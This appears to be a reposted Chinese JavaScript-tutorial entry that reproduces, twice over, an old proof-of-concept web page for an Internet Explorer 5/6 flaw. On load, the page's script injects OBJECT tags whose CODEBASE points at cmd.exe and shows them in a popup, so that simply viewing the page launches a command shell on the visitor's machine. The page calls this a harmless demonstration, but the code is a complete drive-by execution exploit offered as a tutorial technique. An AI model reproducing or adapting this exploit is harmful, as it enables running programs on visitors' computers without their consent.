JAVASCRIPT运行客户端EXE程序
类别: JavaScript教程 
<HTML>
<HEAD>
<TITLE>IE6 security...</TITLE>
<style type="text/css">
BODY{font-family:Arial,Helvetica,sans-serif;font-size:16px;color:#222222;background-color:#aaaabb}
H1{background-color:#222222;color:#aaaabb}
</style>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<SCRIPT language=JScript>
var programName=new Array(
\'c:/windows/system32/cmd.exe\',
\'c:/winnt/system32/cmd.exe\',
\'c:/cmd.exe\'
);
function Init(){
var oPopup=window.createPopup();
var oPopBody=oPopup.document.body;
var n,html=\'\';
for(n=0;n<programName.length;n++)
html+="<OBJECT NAME=\'X\' CLASSID=\'CLSID:11111111-1111-1111-1111-111111111111\' CODEBASE=\'"+programName[n]+"\' %1=\'r\'></OBJECT>";
oPopBody.innerHTML=html;
oPopup.show(290, 190, 200, 200, document.body);
}
</SCRIPT>
</head>
<BODY onload="Init()">
<H1>Hmm, let\'s start a command shell...</H1>
<p>
This page doesn\'t do anything malicious, but is a demonstration of how to execute a program on a remote machine using the
marvelously secure Internet Explorer web browser!!
</p>
<p>
Up until at least 18/02/02, this script would open a command window when viewed in IE5/6 under WindowsXP and Win2k (possibly also WinME). There
are currently no patches available using "Windows Update" which will prevent this.
</p>
</BODY>
</HTML>
<HEAD>
<TITLE>IE6 security...</TITLE>
<style type="text/css">
BODY{font-family:Arial,Helvetica,sans-serif;font-size:16px;color:#222222;background-color:#aaaabb}
H1{background-color:#222222;color:#aaaabb}
</style>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<SCRIPT language=JScript>
var programName=new Array(
\'c:/windows/system32/cmd.exe\',
\'c:/winnt/system32/cmd.exe\',
\'c:/cmd.exe\'
);
function Init(){
var oPopup=window.createPopup();
var oPopBody=oPopup.document.body;
var n,html=\'\';
for(n=0;n<programName.length;n++)
html+="<OBJECT NAME=\'X\' CLASSID=\'CLSID:11111111-1111-1111-1111-111111111111\' CODEBASE=\'"+programName[n]+"\' %1=\'r\'></OBJECT>";
oPopBody.innerHTML=html;
oPopup.show(290, 190, 200, 200, document.body);
}
</SCRIPT>
</head>
<BODY onload="Init()">
<H1>Hmm, let\'s start a command shell...</H1>
<p>
This page doesn\'t do anything malicious, but is a demonstration of how to execute a program on a remote machine using the
marvelously secure Internet Explorer web browser!!
</p>
<p>
Up until at least 18/02/02, this script would open a command window when viewed in IE5/6 under WindowsXP and Win2k (possibly also WinME). There
are currently no patches available using "Windows Update" which will prevent this.
</p>
</BODY>
</HTML>
